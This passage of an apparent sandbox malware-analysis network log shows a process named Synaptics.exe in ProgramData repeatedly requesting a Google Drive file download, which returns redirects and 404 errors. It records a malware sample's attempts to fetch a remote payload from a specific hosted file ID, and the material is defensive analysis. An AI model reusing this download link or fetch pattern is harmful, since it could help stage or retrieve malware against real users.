2024-12-30 10:41:25 UTC	57	IN	Data Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: d on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49728	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:26 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:26 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:26 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-3Y9Ltce_nreaK4AoZKtSfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49727	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:26 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:26 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:26 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-LPnvgkPaHFGshiSqNjjF-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49735	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:26 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:41:27 UTC	1594	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7wy6HR7Nc9loz5iUJx7QL3OJmdpZp060KG8u8O2rIrMQVzOILdT69aMMttQ5wWQRoB Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:26 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-dwYEZN59J6peHOPxTTVhjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw; expires=Tue, 01-Jul-2025 10:41:26 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:27 UTC	1594	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 46 4a 36 5f 37 58 31 2d 54 78 32 45 61 51 38 46 70 59 43 73 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZFJ6_7X1-Tx2EaQ8FpYCsg">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:41:27 UTC	58	IN	Data Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49736	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:26 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:41:27 UTC	1602	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC701F9UKC31NbXhCt5h4gn1h46Pf4ssumseb-0tq_OY5tsRWKqkUYIWbcy8fnFtf3M2SWx4M1U Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:27 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-eqd55webRQyrsVmaBKBDNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP; expires=Tue, 01-Jul-2025 10:41:27 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:27 UTC	1602	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 4a 73 4c 2d 59 7a 78 70 43 42 5a 51 67 43 56 7a 30 41 57 74 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MJsL-YzxpCBZQgCVz0AWtg">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:41:27 UTC	50	IN	Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: is server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49745	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:27 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:28 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:27 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-COp-UYuS9RgezWkqujhdLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49744	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:27 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:28 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:27 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-t8Cqg0JZn-zkkMC8X0X2Xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49746	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:27 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:28 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5Niv7rajJGrTVk2ScH1l5KHTDTLOvnRnOEfDh93ot8t9GeKerkxb6unH4fKHGYENVwWOgB8pk Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:28 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-c3YciWwH3CbBvpOntigSkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:28 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:28 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 35 4c 62 41 6e 45 44 6f 70 63 6d 4b 2d 62 6b 50 7a 48 43 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="h5LbAnEDopcmK-bkPzHCUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:28 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49749	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:27 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:28 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7EWoyqcqBmq1JhmVipuhMLct6NRJbhE8U9tn0C4PwzCb9KIY74hVhYrf7wqj4oX2uVoDHSMM4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:28 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-e3D5kbhLnjTVnovpVhhGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:28 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:28 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 7a 53 6f 61 78 5f 48 78 4c 4d 74 33 42 46 4e 5f 42 6e 4f 70 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="NzSoax_HxLMt3BFN_BnOpw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:28 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49767	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:29 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:30 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:29 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-rhNUedogzZNEBGU8Yx0TEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49768	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:29 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
